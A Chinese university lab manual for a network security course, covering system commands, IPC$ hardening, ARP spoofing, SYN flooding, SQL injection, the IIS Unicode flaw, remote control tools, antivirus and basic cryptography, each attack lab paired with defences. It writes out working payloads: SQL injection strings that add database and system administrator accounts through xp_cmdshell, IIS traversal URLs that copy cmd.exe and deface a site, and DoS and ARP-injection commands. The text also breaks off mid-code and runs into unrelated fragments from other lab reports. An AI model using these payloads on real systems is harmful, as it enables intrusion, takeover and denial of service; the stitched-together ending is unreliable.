《网络安全与管理》实验指导书
指导老师:张瑜
海南师范大学信息科学技术学院网络与信息安全实验室
课程实验主要内容实验1:熟悉常见的系统命令
实验2:防范IPC$攻击
实验3:ARP欺骗的攻击与防范
实验4:拒绝式服务攻击与防范
实验5:注入攻击与防范
实验6:IIS漏洞的攻击与防范
实验7:远程控制工具的使用
实验8:个人版防毒软件安装与使用
实验9:PGP实现邮件加密和签名
实验10:传统密码算法
实验11:DES加解密算法的实现
实验12:RSA加解密算法的实现
实验1 熟悉常见的系统命令
【实验目的】
掌握常见的系统命令和使用方法
【实验准备】
1.有网络连接的pc一台。
2.安装有TCP/IP协议的网络操作系统。
【注意事项】
1、了解若干用于作为实验对象的域名或IP地址。
2、实验指导老师事先准备测试之用的系统、FTP、Telnet账户。
【实验步骤】
1.在Windows2000系统,从开始菜单选择“运行”,在“运行”窗口的“打开”栏输入“CMD”,
进入命令行环境。
2.在CMD环境下依次测试以下命令。
1)ping命令
功能:
它是用来检查网络是否畅通或者网络连接速度的命令。它所利用的原理是这样的:网络商的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,并可以初步判断目标主机的操作系统等。
2)nbtstat
功能:
该命令使用TCP/IP上的NETBIOS显示协议统计和当前TCP/IP连接,使用这个命令你可以得到远程主机的NETBIOS信息,比如用户名、所属的工作组、网卡的MAC地址等。
3)netstat
功能:
这是一个用来查看网络状态的命令,操作简便,功能强大。
参数说明:
-a 查看本地机器的所有开放端口,通过端口可以了解本地开放服务信息,也可以有效发现和判断木马和恶意程序开启的服务
-n 以数字形式显示地址和端口号。
4)net
这个命令是网络命令中最重要的一个,必须透彻掌握它的每一个子命令。
5)net view
使用此命令查看远程主机的所有共享资源。命令格式为 net view \\IP。
6)net use
指定一个名字以便与资源相连接,或者指定要切断的设备。
7)net start
使用它启动主机上的服务
用法:net start 服务名
8)net shop
使用它关闭主机上的服务
9)net user
查看和账户有关的情况,包括新建账户、删除特定账户、激活账户、账户禁用等。
10)at
这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序(需要Schedule是启动状态下)。当我们知道了远程主机的当前时间,就可以利用此命令让其在以后的某个时间执行某个程序和命令。
实验2:Windows操作系统的攻击与防范(防范IPC$攻击) 【实验目的】
空会话通常会为黑客成功入侵提供跳板,如提供远程主机时间、用户列表等,大大增加了黑客入侵的成功机会。通过实验,来限制IPC$连接,增加主机的安全性。
【实验准备】
IPC连接是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多DLL 函数,所以实验机器系统必须是Windows NT内核版本如XP/2000/2003等。
【注意事项】
IPC$所使用的端口必须开放
【实验步骤】
1、指定安全口令
一个好的密码应当至少7个字符长,不要用个人信息(如生日、名字等),密码中要有一些非字母(如数字、标点符号、控制字符等),还要好记一些,不能写在纸上或计算机中的文件中,不要在不同系统中使用同一密码。定期改变密码,至少6个月改变一次。
2、重新命名Administrator帐号
3、禁用或删除不必要的帐号
4、关闭帐号的空连接
IPC$(Internet Process Connection)是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
Key:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA] RestrictAnonymous = DWORD:00000001
删除管理共享
HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
对于windows2000服务器而言:
Key:
Name: AutoShareServer
Type: DWORD
Value: 0
对于windows2000工作站或XP而言:
Key:
HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters
Name: AutoShareWks
Type: DWORD
Value: 0
修改注册表后需要重启Server服务或重新启动机器。
5、关闭不必要的服务和端口
关闭文件打印共享服务
关闭137、138、139、445端口
实验3:ARP欺骗的攻击与防范
【实验目的】
通过实验了解ARP通讯和欺骗原理,学会使用合适的方法进行ARP欺骗防范。
【实验准备】
1、安装Winpcap
2、打开注册表
HKEY_LOCAL-MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters将
IPEnableRouter数值数据修改为1,开启IP路由功能。
【注意事项】
三台机器一组,实验后将ARP黑客软件从机器彻底删除,避免恶意应用影响网络运行。【实验步骤】
一、ARP欺骗的攻击
Zarp是一款通过局域网arp欺骗,向局域网内所有机器访问的网页的代码里插入任意代码,实现开天窗、打开任意网址,投放任意广告,乃至实现网页挂马的结果。
试验环境:机器a和机器b在同在局域网内(在同一个交换机下)。
将zarp、winpcap拷贝到机器a的c盘test文件夹下。先安装winpcap,然后在cmd下输入cd C:\test,再次输入zarp,将看到你机器的网卡索引号以及该软件的用法说明。
1)如图所示,0,1,2就是网卡的序号,请确认哪个索引号是你正在局域网内使用的
网卡,图中为2。
2)知道网卡索引号后,可以输入以下形式命令回车。
zarp.exe -idx 2 -ip 192.168.1.2-192.168.1.100 -port 80 -insert "
特别提醒:-idx后面的2根据你的实际网卡序号填写,默认是0;-ip后面是你局域网所需要攻击的网段地址;-insert里插入的是一个框架网页(示范里面网址写错了:-),多加了一个com,大家实验时可改成实际需要的网页地址)
3)回车后,zarp工具会向所有的-ip范围内的机器访问网页里强行插入框架代码,
zarp也会显示插入代码结果。
此时受攻击ip范围内的机器访问任何网站,左上角都会显示框架网页天窗。(如插入的代码的网址窗口的长、宽都是0,则网页上就无法显示了。)
但查看网页源文件时,我们都会看到网页被强行插入的代码。"
二、 ARP欺骗的防范
为了防范针对网关的ARP攻击,可以将网关的MAC地址与IP地址进行绑定。
打开命令行状态,按照以下格式进行
Arp s 192.168.0.3 CC:CC:CC:CC:CC:CC(回车)
实验4:拒绝式服务攻击与防范
【实验目的】
熟悉SYNflood的攻击原理与过程,及IPv4所存在的固有缺陷。
【实验准备】
准备xdos.exe拒绝服务工具。
【注意事项】
实验后将DoS黑客软件从机器彻底删除,避免恶意应用影响网络运行。
【实验步骤】
一、拒绝式服务攻击
拒绝服务攻击的英文意思是Denial of Service,简称DoS。这种攻击行动使网站服务器充斥大量要求回复的信息,消耗网络带宽或系统资源,导致网络或系统不胜负荷直至瘫痪而停止提供正常的网络服务。
SYN-Flood是当前最常见的一种Dos攻击方式,它利用了TCP协议的缺陷进行攻击
用黑客软件xdos.exe对目标计算机进行拒绝服务攻击并运行测试。
(1)计算机a登录到windows 2000,打开sniffer pro,在sniffer pro中配置好捕捉从任意
主机发送给本机的ip数据包,并启动捕捉进程。
(2)在计算机B上登录Windows 2000,打开命令提示窗口,运行xdos.exe,命令的格式:”xdos<目标主机IP>端口号–t 线程数 [-s <插入随机IP>’]”(也可以用“xdos?”命令查看使用方法)。输入命令:xdos 192.168.2.10 80 –t 200 –s* 确定即可进行攻击,192.168.2.10 是计算机A的地址。
(3)在A端可以看到电脑的处理速度明显下降,甚至瘫痪死机,在Sniffer Pro的 Traffic Map 中看到最大伪造IP的主机请求与A的电脑建立连接。
(4)B停止攻击后,A的电脑恢复快速响应。打开捕捉的数据包,可以看到有大量伪造IP地址的主机请求与A的电脑连接的数据包,且都是只请求不应答。以至于A的电脑保持有大量的半开连接。运行速度下降直至瘫痪死机,拒绝为合法的请求服务。
二、拒绝式服务防范
几乎所有的主机平台都有抵御DoS的设置,常见的有以下几种。
(1) 关闭不必要的服务。
(2) 限制同时打开的Syn半连接数目。
(3) 缩短Syn半连接的time out 时间。
(4) 及时更新系统补丁。
实验5:注入攻击与防范
【实验目的】
注入攻击一度是互联网上最为流行的攻击方式,通过实验了解注入攻击原理,增强防范意识。【实验准备】
教师从网络上下载网上商城系统,安装在测试服务器上。
【注意事项】
请同学们不要直接利用注入攻击对互联网上的网站进行攻击。
【实验步骤】
所谓 SQL注入(SQL Injection),就是利用程序员对用户输入数据的合法性检测不严或不检测的特点,故意从客户端提交特殊的代码,从而收集程序及服务器的信息,查询数据库,获取想得到的资料。
一、注入攻击
(1)通过恶意构造字符串然后绕过登陆验证的。
A.分析程序代码
B.构造特殊登陆用户名进行登陆“a' or 1=1”
(2)通过恶意构造字符串进行添加、删除、修改数据库管理员和系统管理员的操作
A.分析程序代码
B.构造特殊字符串
news.asp?id=2;exec master.dbo.sp_addlogin test,test;-- //添加数据库用户用户test,密码为test news.asp?id=2;exec master.dbo.sp_password test,123456,test;-- //如果想改密码,则用这句(将test的密码改为123456)
news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- //将test加到sysadmin组,这个组的成员可执行任何操作
news.asp?id=2;exec master.dbo.xp_cmdshell 'net user test test /add';-- //添加系统用户test,密码为test
news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';-- //将系统用户test提升为管理员
这样,你在他的数据库和系统内都留下了test管理员账号了
二、注入攻击防范
对客户端的get请求和post请求过滤到如下字符
'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare
实验6:IIS漏洞的攻击与防范
【实验目的】
利用Unicode漏洞攻击,了解IIS漏洞攻击原理以及危害,通过及时打补丁防范此类攻击。【实验准备】
在一台教师机中,先安装Virtual PC,然后在虚拟机里安装Windows 2000 Server(SP0)及IIS
【注意事项】
虚拟目录scripts需要有执行的权限;系统目录和Inetpub目录在同一分区中
【实验步骤】
Microsoft IIS是允许在公共Intranet或Internet上发布信息的Web服务器,IIS可以提供HTTP、FTP、gopher服务。
Uicode为一个ISO国际标准,它包含了世界各国的常用文字,可支持数百万个字码。它的目的是统一世界各国的字符编码。许多操作系统,最新的浏览器和其他产品都支持Unicode编码。
IIS 4.0、IIS5.0在使用Unicode解码时存在一个安全漏洞,导致用户可以远程通过IIS 执行任意命令。当用户用IIS打开文件时,如果该文件名包含Unicode字符,系统会对其进行解码。如果用户提供一些特殊的编码请求,将导致IIS错误地打开或者执行某些Web根目录以外的文件。
通过此漏洞,攻击者可查看文件内容、建立文件夹、删除文件、拷贝文件且改名、显示目标主机当前的环境变量、把某个文件夹内的全部文件一次性拷贝到另外的文件夹去、把某个文件夹移动到指定的目录和显示某一路径下相同文件类型的文件内容等。
一、Unicode漏洞攻击
1、在windows xp中建立网站,首页为default.htm
2、使用SuperScan检测网络中某IP段的Unicode漏洞情况
3、在 IE 地址栏输入 http://192.168.0.25/scripts/..%c1%1c../winn/system32/cmd.exe?
/c+dir(其中%c1%1c为Windows 2000中文版“/”的Unicode编码)
4、在 IE 地址栏输入 http://192.168.0.25/scripts/..%c1%1c../winn/system32/cmd.exe?
/c+copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\root.exe(将cmd.exe复制到scripts 目录中)
5、在 IE 地址栏输入http://*.*.*.*/scripts/root.exe?/c+echo+内容
+>d:\pup\wwwroot\index.htm来修改网站首页
二、Unicode漏洞攻击的防范
若系统存在Uuicode漏洞,可采取如下方法进行补救:
(1)限制网络用户访问和调用CMD命令的权限;
(2)若没必要使用SCRIPTS和MSADC目录,将其全部删除或改名;
(3)安装IIS的注意点
①避免安装在主域控制器上
②避免安装在系统分区上
③安装Windows NT系统时不要使用默认winnt路径,您可以改为其他的文件
夹,如C:\mywindowsnt;
(4)端口安全性的实现
(5)用户可从Microsoft网站安装补丁。
实验7:远程控制工具的使用
【实验目的】
演示远程工具Radmin的使用,使试验者了解远程工具的功能,深入了解远程控制在恶意程序中的使用可造成的巨大危害
【实验准备】
准备两台安装有Remote administrator的计算机
【实验步骤】
Radmin (Remote Administrator) 是一款远程控制软件,可以远程管理公司或个人计算机,实现远程办公。可以进行完全控制、屏幕监视、文件管理、远程DOS操作等功能。操作简单,容易上手,只需要被控制主机执行服务端,安装服务,设置好连接端口和密码,您就可以利用控制端进行远程控制。
软件特点:
运行速度快,在10Mbps局域网的测试中,它比流行的VNC要快上150倍,也超过了PcAnywhere。
Radmin支持被控端以服务的方式运行、支持多个连接和IP过滤(即允许特定的IP控制远端机器)、个性化的文件互传、远程关机、支持高分辨率模式、基于 Windows NT 的安全支持及密码保护以及提供日志文件支持等。
在安全性方面,Radmin支持 Windows NT/2000 用户级安全特性,您可以将远程控制的权限授予特定的用户或者用户组,Radmin将以加密的模式工作,所有的数据(包括屏幕影像、鼠标和键盘的移动)都使用128位强加密算法加密;服务器端会将所有操作写进日志文件,以便于事后查询,服务器端有IP过滤表,对IP过滤表以外的控制请求将不予响应。
与PcAnywhere不同,Radmin目前只支持TCP/IP协议,不过没有关系,TCP/IP是目前网络应用中最流行的协议,应用十分广泛。
程序体积小巧,并且安装简单、配置容易,安装程序大小为 1.2MB,但其具备了所有这类软件的常用功能。
1、尝试使用Remote administrator的远程控制功能对远程计算机进行访问,实验远程访
问功能和本地访问的区别
2、尝试使用Remote administrator的监控功能对远程计算机进行监控,并记录远程计算
机的活动
3、尝试使用Remote administrator的文件传输功能对远程计算机上的文件进行存取,实
验远程控制工具对远程文件的访问
实验8:个人版防毒软件安装与使用
【实验目的】
学会安装杀毒软件和使用杀毒软件
【实验准备】
装有Windows xp操作系统的计算机
【实验步骤】
1、写出冲击波、兰色代码、网银大盗的病毒说明,并简单描述其发作现象
2、金山毒霸(或360安全卫生等类似软件)的安装步骤
1)点击金山毒霸安装的.exe文件,出现金山毒霸2011安装程序引导框,单击下一步2)出现金山毒霸最终用户许可协议,选择接受协议
3)出现金山毒霸2011最新说明,单击下一步,出现客户信息,单击下一步
4)输入序列号和激活码,启动金山毒霸主程序,点击完成
3、金山毒霸软件的使用
1)使用金山毒霸杀毒软件,对C盘进行杀毒,查看是否有病毒。
打开金山毒霸—杀毒路径选择C盘—杀毒
2)设置金山毒霸杀毒软件每周一12:00对硬盘进行查毒。
打开金山毒霸—任务—定时查毒
3)设置金山毒霸杀毒软件每周五18:00对硬盘进行查毒。
打开金山毒霸—任务—定时查毒
4)设置金山毒霸杀毒软件检查所有驱动器中是否有病毒。
打开金山毒霸—杀毒路径选择所有驱动器—杀毒
5)设置金山毒霸杀毒软件,开机时自动启动防火墙。
打开金山毒霸—选项设置—选择开机时自动启动防火墙
6)利用金山毒霸杀毒软件的在线升级功能,使其从Internet互联网上对病毒库进行升级和更新。
打开金山毒霸—点击“在线升级”按钮
实验9:PGP实现邮件加密和签名【实验目的】
1、了解加密工具PGP的原理
2、熟悉PGP简单配置方法
【实验环境】
安装PGP加密软件;主机操作系统为Windows2000或Windows XP;
【实验原理】
PGP—Pretty Good Privacy,是一个基于RSA公匙加密体系的邮件加密软件。可以用它对你的邮件保密以防止非授权者阅读,它还能对你的邮件加上数字签名从而使收信人可以确信邮件是你发来的。它让你可以安全地和你从未见过的人们通讯,事先并不需要任何保密的渠道用来传递密匙。它采用了:审慎的密匙管理,一种RSA和传统加密的杂合算法,用于数字签名的邮件文摘算法,加密前压缩等,还有一个良好的人机工程设计。它的功能强大有很快的速度。而且它的源代码是免费的。
【实验步骤】
使用PGP软件对邮件等进行加密和签名。
1、使用PGP创建密钥对
A、安装PGP
B、电脑重启后将“注册码”拷贝到“PGP LICENSE AUTHORIZATION”,在PASSPHASE中输入一个N位通行码。
C、打开“PGP DISK”按照步骤创建一对密钥对。
D、创建密钥对也可如此做:打开“PGP KEYS”选择“KEYS”?“ NEW
KEYS”然后按提示做即可。
2、导出公钥
打开“PGP KEYS”选择“KEYS”?“EXPORT”将公钥导出为扩展名为ASC的文件,将此文件发给朋友。
1、使用PGP加密、解密邮件
加密过程:用朋友发来的公钥对邮件加密,在“PGP KEYS”?“KEYS”?“IMPORT”将公钥导入,用此公钥加密。首先将邮件正文拷贝到剪贴板,然后点击“开始”-“程序”-“PGP”-“PGPMail”-“EnCRYPT&Sign”,再将剪贴板的内容粘贴到信件中,即为加密后的密文。
解密过程:解密时,拷贝朋友发过来的密文到剪贴板,然后点击“DECRYPT&VERIFY”,输入通行码即可。
2、使用PGP签名和验证签名:过程同上。
3、使用PGP加密解密文件:
A、右键单击要加密的文件,选择“PGP”-“EnCrypt”,选择加密文
件存放的路径即可。
B、双击PGP加密了的文件,输入私钥通过短语即可。
【实验结果】PGP实现了邮件的加密和签名
【实验思考题】
PGP加解密邮件的原理是什么?
实验10:传统密码算法
【实验目的】
通过编程实现替代密码算法和置换密码算法,加深对古典密码体制的了解,为深入学习密码学奠定基础
【实验环境】
运行Windows操作系统的PC机,具有C语言编译环境。
【实验原理】
古典密码算法历史上曾被广泛应用,大都比较简单,使用手工和机械操作来实现加密和解密.它的主要应用对象是文字信息,利用密码算法实现文字信息的加密和解密.下面介绍两种常见的具有代表性的古典密码算法,以帮助读者对密码算法建立一个初步的印象.
1. 替代密码
替代密码算法的原理是使用替代法进行加密,就是将明文中的字符用其它字符替代后形成密文.例如:明文字母a,b,c,d ,用D,E,F,G做对应替换后形成密文.
替代密码包括多种类型,如单表替代密码,多明码替代密码,多字母替代密码,多表替代密码——.下面我们介绍一种典型的单表替代密码,恺撒(caesar)密码,又叫循环移位密码.它的加密方法,就是将明文中的每个字母用此字符在字母表中后面第k个字母替代.它的加密过程可以表示为下面的函数:
E(m)=(m+k) mod n
其中:m为明文字母在字母表中的位置数;n为字母表中的字母个数;k为密钥;E(m)
为密文字母在字母表中对应的位置数.
例如,对于明文字母H,其在字母表中的位置数为8,设k=4,则按照上式计算出来的
密文为L:
E(8) = (m+k) mod n = (8+4) mod 26 = 12 = L
2. 置换密码
置换密码算法的原理是不改变明文字符,只将字符在明文中的排列顺序改变,从而实现明文信息的加密.置换密码有时又称为换位密码.
矩阵换位法是实现置换密码的一种常用方法.它将明文中的字母按照给的顺序安排在一个矩阵中,然后用根据密钥提供的顺序重新组合矩阵中字母,从而形成密文.例如,明文为attack begins at five,密钥为cipher,将明文按照每行6列的形式排在矩阵中,形成如下形式:
a t t a c k
b e g i n s
a t f i v e
根据密钥cipher中各字母在字母表中出现的先后顺序,给定一个置换:
1 2 3 4 5 6
F= 1
4 5 3 2 6 1
根据上面的置换,将原有矩阵中的字母按照第1列,第4列,第5列,第3列,第2列,第6列的顺序排列,则有下面形式:
a a c t t k
b i n g e s
a i v f t e
从而得到密文:abatgftetcnvaiikse
其解密的过程是根据密钥的字母数作为列数,将密文按照列,行的顺序写出,再根据由密钥给出的矩阵置换产生新的矩阵,从而恢复明文.
【实验步骤】
(1)根据实验原理部分对替代密码算法的介绍,自己创建明文信息,并选择一个密钥k,编写替代密码算法的实现程序,实现加密和解密操作.
(2)根据实验原理部分对置换密码算法的介绍,自己创建明文信息,并选择一个密钥,编写置换密码算法的实现程序,实现加密和解密操作.
【实验结果】:
1:L
2:abatgftetcnvaiikse
【实验思考题】
1:替代密码的原理是什么?
2:置换密码的原理是什么?
实验11: DES加解密算法的实现
【实验目的】
掌握DES加密算法的加解密过程。
【实验环境】
VC或TC编程环境;主机操作系统为Windows2000或Windows XP;
【实验原理】
要深入理解对称加密算法,掌握DES加密过程。具备一定的C语言编程技能。
DES( Data DES( Data Encryption Standard)算法,于1977年得到美国政 府的正式许可,是一种用56位密钥来加密64位数据的方法。DES算法以被应用于许多需要安全加密的场合。
(一)、密钥生成
1、变换密钥
取得64位的密钥,每个第8位作为奇偶校验位。
2、变换密钥。
(1)、舍弃64位密钥中的奇偶校验位,根据下表(PC-1)进行密钥变换
得到56位的密钥,在变换中,奇偶校验位以被舍弃。
(2)、将变换后的密钥分为两个部分,开始的28位称为C[0],最后的28
位称为D[0]。
(3)生成16个子密钥,初始I=1。
(i)、同时将C[I]、D[I]左移1位或2位,根据I值决定左移的位数。
(ii)、将C[I]D[I]作为一个整体按下表(PC-2)变换,得到48位的K[I] (iii)、从1-2-3-1处循环执行,直到K[16]被计算完成。
(二)、处理64位的数据
1、取得64位的数据,如果数据长度不足64位,应该将其扩展为64位
(例如补零)
2、将64位数据按下表变换(IP)
3、将变换后的数据分为两部分,开始的32位称为L[0],最后的32位称
为R[0]。
4、用16个子密钥加密数据,初始I=1。
(1)、将32位的R[I-1]按下表(E)扩展为48位的E[I-1]
(2)、异或E[I-1]和K[I],即E[I-1] XOR K[I]
(3)、将异或后的结果分为8个6位长的部分,第1位到第6位称为B[1],
第7位到第12位称为B[2],依此类推,第43位到第48位称为B[8]。
(4)、按S表变换所有的B[J],初始J=1。所有在S表的值都被当作4位
长度处理。
(i)将B[J]的第1位和第6位组合为一个2位长度的变量M,M作为在S[J]
中的行号。
(ii)、将B[J]的第2位到第5位组合,作为一个4位长度的变量N,N 作为在S[J]中的列号。
(iii)、用S[J][M][N]来取代B[J]。
(iv)、从(i)处循环执行,直到B[8]被替代完成。
(5)、将B[1]到B[8]组合,按下表(P)变换,得到P。
(6)、异或P和L[I-1]结果放在R[I],即R[I]=P XOR L[I-1]。
(7)、L[I]=R[I-1]
(8)、从2-4-1处开始循环执行,直到K[16]被变换完成。
5、、组合变换后的R[16]L[16](注意:R作为开始的32位),按下表(IP-1)
变换得到最后的结果。
【实验步骤】
利用编程语言实现DES加解密算法。
1、编程:包含的功能函数有:
static void DES(char Out[8], char In[8], const SUBKEY_P pskey, bool Type);//标
准DES 加/解密
static void SETKEY(const char* Key, int len);// 设置密钥
static void Set_SubKey(SUBKEY_P pskey, const char Key[8]);// 设置子密钥
static void F_FUNCTION(bool In[32], const bool Ki[48]);// f 函数完成扩展置
换、S-盒代替和P 盒置换
static void S_BOXF(bool Out[32], const bool In[48]);// S-盒代替函数
static void TRANSFORM(bool *Out, bool *In, const char *Table, int len);// 变换
函数
static void XOR(bool *InA, const bool *InB, int len);//异或函数
static void CYCLELEFT(bool *In, int len, int loop);// 循环左移函数
static void ByteToBit(bool *Out, const char *In, int bits);// 字节组转换成位组函
数
static void BitToByte(char *Out, const bool *In, int bits);// 位组转换成字节组函
数
2、调试
3、运行结果
4、存盘
【实验结果】
加密:
Key: 0x30 0x30 0x30 0x30......0x30(8个字节)
Data: 0x31 0x31 0x31 0x31......0x31(8个字节)
Mode: Encryption
结果:65 5e a6 28 cf 62 58 5f
解密:
Key: 0x31 0x31......0x31(8个0x31)
Data: 65 5e a6 28 cf 62 58 5f
Mode: Decryption
结果:0x31 0x31......0x31(8个0x31)
【实验思考题】
DES算法主要有哪几部分?可以画出流程
【DES源程序(仅供参考)】
///
/// DES加密
///
/// 被加密的明文
/// 密钥
/// 向量
///
public static Byte[] DESEncrypt(Byte[] Data, String Key, String Vector)
{
Byte[] bKey = new Byte[8];
Array.Copy(Encoding.UTF8.GetBytes(Key.PadRight(bKey.Length)), bKey, bKey.Length);
Byte[] bVector = new Byte[8];
Array.Copy(Encoding.UTF8.GetBytes(Vector.PadRight(bVector.Length)), bVector,
bVector.Length);
Byte[] Cryptograph =null; // 加密后的密文
DESCryptoServiceProvider EncryptProvider = new DESCryptoServiceProvider(); EncryptProvider.Mode =CipherMode.CBC;
EncryptProvider.Padding =PaddingMode.Zeros;
try
{
// 开辟一块内存流
using (MemoryStream Memory = new MemoryStream())
{
// 把内存流对象包装成加密流对象
using (CryptoStream Encryptor =new CryptoStream(Memory,
EncryptProvider.CreateEncryptor(bKey, bVector),
CryptoStreamMode.Write))
{
// 明文数据写入加密流
Encryptor.Write(Data, 0, Data.Length);
Encryptor.FlushFinalBlock();
Cryptograph =Memory.ToArray();
}
}
}
catch
{
Cryptograph =null;
}
return Cryptograph;
}
///
/// DES解密
///
/// 被解密的密文
/// 密钥
/// 向量
///
public static Byte[] DESDecrypt(Byte[] Data, String Key, String Vector)
{
Byte[] bKey = new Byte[8];
Array.Copy(Encoding.UTF8.GetBytes(Key.PadRight(bKey.Length)), bKey, bKey.Length);
Byte[] bVector = new Byte[8];
Array.Copy(Encoding.UTF8.GetBytes(Vector.PadRight(bVector.Length)), bVector, bVector.Length);
Byte[] original =null;
DESCryptoServiceProvider CryptoProvider = new DESCryptoServiceProvider();
CryptoProvider.Mode =CipherMode.CBC;
CryptoProvider.Padding =PaddingMode.Zeros;
try
{
// 开辟一块内存流,存储密文
using (MemoryStream Memory = new MemoryStream(Data))
{
// 把内存流对象包装成加密流对象
using (CryptoStream Decryptor =new CryptoStream(Memory,
CryptoProvider.CreateDecryptor(bKey, bVector),
CryptoStreamMode.Read))
{
// 明文存储区
using (MemoryStream originalMemory =new MemoryStream())
{
Byte[] Buffer =new Byte[1024];
Int32 readBytes = 0;
while ((readBytes =Decryptor.Read(Buffer, 0, Buffer.Length)) > 0)
{
originalMemory.Write(Buffer, 0, readBytes);
}
original =originalMemory.ToArray();
}
}
}
}
catch
{
original =null;
}
return original;
}
实验12:RSA加解密算法的实现
【实验目的】
掌握RSA加密算法的加解密过程。
【实验环境】
VC或TC编程环境;主机操作系统为Windows2000或Windows XP;
【实验原理】
RSA加密算法是一种非对称加密算法。在公钥加密标准和电子商业中RSA 被广泛使用。RSA是1977年由罗纳德·李维斯特(Ron Rivest)、阿迪·萨莫尔、(Adi Shamir)和伦纳德·阿德曼(Leonard Adleman)一起提出的。当时他们三人都在麻省理工学院工作。RSA就是他们三人姓氏开头字母拼在一起组成的。
RSA算法的可靠性基于分解极大的整数是很困难的。假如有人找到一种很快的分解因子的算法的话,那么用RSA加密的信息的可靠性就肯定会极度下降。但找到这样的算法的可能性是非常小的。今天只有短的RSA钥匙才可能被强力方式解破。到2008年为止,世界上还没有任何可靠的攻击RSA算法的方式。只要其钥匙的长度足够长,用RSA加密的信息实际上是不能被解破的。
1、公钥和私钥的产生
假设Alice想要通过一个不可靠的媒体接收Bob的一条私人讯息。她可以用以下的方式来产生一个公钥和一个密钥:
随意选择两个大的质数p和q,p不等于q,计算N=pq。
根据欧拉函数,不大于N且与N互质的整数个数为(p-1)(q-1)
选择一个整数e与(p-1)(q-1)互质,并且e小于(p-1)(q-1)
用以下这个公式计算d:d× e ≡ 1 (mod (p-1)(q-1))
将p和q的记录销毁。
e是公钥,d是私钥。d是秘密的,而N是公众都知道的。Alice将她的公钥传给Bob,而将她的私钥藏起来。
2、加密消息
假设Bob想给Alice送一个消息m,他知道Alice产生的N和e。他使用起先与Alice约好的格式将m转换为一个小于N的整数n,比如他可以将每一个字转换为这个字的Unicode码,然后将这些数字连在一起组成一个数字。假如他的信息非常长的话,他可以将这个信息分为几段,然后将每一段转换为n。用下面这个公式他可以将n加密为c:
计算c并不复杂。Bob算出c后就可以将它传递给Alice。
3、解密消息
Alice得到Bob的消息c后就可以利用她的密钥d来解码。她可以用以下这个公式来将c转换为n:
得到n后,她可以将原来的信息m重新复原。
解码的原理是
以及ed ≡ 1 (mod p-1)和ed ≡ 1 (mod q-1)。费马小定理证明
这说明(因为p和q是不同的质数)
【实验步骤】
1、求素数p和q
2、求公钥(e,n):e与ψ(n) = (p-1)(q-1)互质
3、求私钥(d,n):d× e ≡1 (mod (p-1)(q-1))
4、加密过程:c=(M e)mod n
5、解密过程:m=(C d)mod n
【实验结果】
找两个素数: p=47 q=59
n=p*q=2773 ,t=(p-1)*(q-1)=2668
寻找 e 满足 e 1:加密m =465,得C= 1118 2:解密C=1118,得m=465 【思考题】 RSA算法主要有哪几部分? 【RSA源程序(仅供参考)】 #include #include #include #include #include using namespace std; //存放素数 int prime[1305]; //用筛选法求素数 int p[10005]; void PRIME() { int i,i2,k; for(i=0;i<=10000;i+=2) p[i]=0; for(i=1;i<=10000;i+=2) p[i]=1; p[2]=1;p[1]=0; for(i=3;i<=100;i+=2) { if(p[i]==1) 网络扫描与网络嗅探 一实验目的 (1)理解网络嗅探和扫描器的工作机制和作用 (2)使用抓包与协议分析工具Wireshark (3)掌握利用扫描器进行主动探测,收集目标信息的方法 (4)掌握使用漏洞扫描器检测远程或本地主机安全性漏洞 二实验环境 Windows xp操作系统平台,局域网环境,网络抓包与协议分析工具Wireshark,扫描器软件:Superscan 三实验步骤 使用Wireshark 抓包并进行协议分析 (1)下载并安装软件,主界面如图1所示。 图1 (2)单击capture,打开interface接口选项,选择本地连接,如图2所示。 图2 (3)使用Wireshark数据报获取,抓取TCP数据包并进行分析 从抓取的数据包来看,首先关于本次分析的数据包是典型的TCP三次握手,如图3所示。 图3 (4)TCP三次握手过程分析(以第一次握手为例) 主机(172.16.1.64)发送一个连接请求到(172.16.0.1),第一个TCP包的格式如图4所示。 图4 第三行是ipv4的报文,网际协议IP是工作在网络层,也就是数据链路层的上层, IPv4报文中的源地址和目的地址是ip地址,版本号TCP是6,其格式为如图5所示。 图5 第四行是TCP报文,从上面两个可以知道,这个TCP包被层层包装,经过下面一层就相应的包装一层,第三段是经过传输层的数据,TCP报文的格式为如图6所示。 图6 TCP的源端口2804也就是宿主机建立连接开出来的端口,目的端口8080。Sequence number同步序号,这里是0x3a 2a b7 bb,但这里显示的是相对值0。Acknowledgment number确认序号4bytes,为0,因为还是第一个握手包。Header Length头长度28字节,滑动窗口65535大小字节,校验和,紧急指针为0。Options选项8字节 中南林业科技大学 实验报告 课程名称:计算机网络安全技术 专业班级:2014 级计算机科学与技术 2班 姓名:孙晓阳 / 学号: ( 目录 实验一java 安全机制和数字证书的管理 (5) 一实验名称 (5) 二实验目的 (5) 三实验内容 (5) 四实验结果和分析 (6) , 命令输入 (6) 分析 (7) 五小结 (8) 实验二对称密码加密算法的实现 (10) 一实验名称 (10) 二实验目的 (10) 三实验内容 (10) ? 四实验结果和分析 (10) 说明 (10) 实验代码 (10) 实验结果 (13) 五小结 (13) 实验三非对称密钥 (14) 一实验名称 (14) { 二实验目的 (14) 三实验内容 (14) 四实验结果和分析 (14) 实验代码 (14) 实验结果 (15) 五小结 (16) 实验四数字签名的实现 (17) — 一实验名称 (17) 二实验目的 (17) 三实验内容 (17) 四实验结果和分析 (17) 实验代码 (17) 实验结果 (19) 五小结 (19) ? 总结 (19) 实验一java 安全机制和数字证书的管理》 一实验名称 java 安全机制和数字证书的管理 二实验目的 了解 java 的安全机制的架构和相关的知识; 利用 java 环境掌握数字证书的管理 三实验内容 java 安全机制(JVM,沙袋,安全验证码)。 & java 的安全机制的架构 加密体系结构(JCA,Java Cryptography Architecture) 构 成 JCA 的类和接口: :定义即插即用服务提供者实现功能扩充的框架与加解密功能调用 API 